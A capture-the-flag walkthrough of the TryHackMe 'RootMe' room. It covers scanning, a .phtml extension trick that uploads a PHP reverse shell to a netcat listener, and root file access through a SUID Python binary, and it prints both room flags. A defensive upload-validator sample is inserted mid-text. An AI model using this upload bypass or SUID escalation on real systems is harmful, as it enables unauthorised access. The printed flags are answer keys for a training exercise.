RootMe
This is a very basic CTF room from tryhackme.com – you are basically guided through it step by step. Let’s have a look.
sudo nmap -sV 10.10.189.114
So there we have our first three answers: 2 ports, Apache 2.4.29, and an SSH server running on port 22.
Time for gobuster
gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.189.114 -x php,txt,html,js,pdf
So panel is our next answer.
When we visit the panel URL we see a simple upload form and our task is to upload a webshell. In kali there is one at
/usr/share/webshells/php/php-reverse-shell.php
But you can easily find them on the web as well.
First of all we copy it to our working directory, shorten the name and change the extension.
cp /usr/share/webshells/php/php-reverse-shell.php .
mv php-reverse-shell.php rs.phtml
The name shortening is just for convenience – changing the extension has a practical reason: .php files are most often blocked by upload forms, while .phtml files are more likely to go through.
We now have to change rs.phtml a bit.
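The defender's side of this point, added here and not part of the original writeup: a small Python upload validator that shows why a blocklist on `.php` still accepts `rs.phtml`, next to an allowlist check that also verifies the file header and hands out a server-chosen filename. The image-only allowlist and the magic-byte table are assumptions for the example.

```python
import os
import secrets

# Constructed policy for the example: the form is meant to accept images only.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
# Leading bytes each allowed type must start with, so content has to match the name.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def blocklist_check(filename):
    """The weak check the writeup relies on: only '.php' is refused.
    Anything else, including rs.phtml, is accepted."""
    return not filename.lower().endswith(".php")


def allowlist_check(filename, data):
    """Hardened check: exactly one extension, taken from an allowlist,
    and the file content must begin with that type's signature."""
    name = os.path.basename(filename)  # drop any directory components
    parts = name.split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False  # no extension, or a double extension like x.php.png
    ext = parts[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False
    return data.startswith(MAGIC[ext])


def stored_name(filename, data):
    """Return a server-chosen filename for an accepted upload, or None.
    The uploader never controls the stored name; the upload directory
    should additionally be served without script execution."""
    if not allowlist_check(filename, data):
        return None
    ext = os.path.basename(filename).rsplit(".", 1)[1].lower()
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed sample uploads: the renamed reverse shell and a real PNG header.
    shell = b"<?php set_time_limit (0); // ..."
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print("blocklist accepts rs.phtml:", blocklist_check("rs.phtml"))          # True
    print("allowlist accepts rs.phtml:", allowlist_check("rs.phtml", shell))   # False
    print("allowlist accepts cat.png:", allowlist_check("cat.png", png))       # True
```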
vi rs.phtml
We have to change the $ip variable to that of our local machine so the reverse shell can connect back to us.
We then can upload the rs.phtml.
That went through – good. Now we need to set up netcat on our end to listen for the reverse shell.
The reverse shell is looking for us on port 1234 so our netcat command is
nc -lnvp 1234
From our gobuster scan we know that there is an uploads directory – we assume our rs.phtml file is there now – so let’s try.
We open
http://10.10.189.114/uploads/rs.phtml
with the browser and immediately see the incoming connection in our netcat session:
So let’s look for the user flag. Or be lazy and let Linux find it for us:
find / -name user.txt 2>/dev/null
It is at /var/www/user.txt and reads
THM{y0u_g0t_a_sh3ll}
So that’s our first answer.
Next we are supposed to look for files with the SUID flag. So let’s do that.
find / -perm -4000 -user root 2>/dev/null
The interesting result is
/usr/bin/python
Because a SUID binary owned by root runs with root’s privileges, it means we can execute Python as root.
We assume the root flag is in /root/root.txt – so let’s just try to read it out using Python.
python -c 'print(open("/root/root.txt").read())'
And we are lucky. It prints out the root flag, which is
THM{pr1v1l3g3_3sc4l4t10n}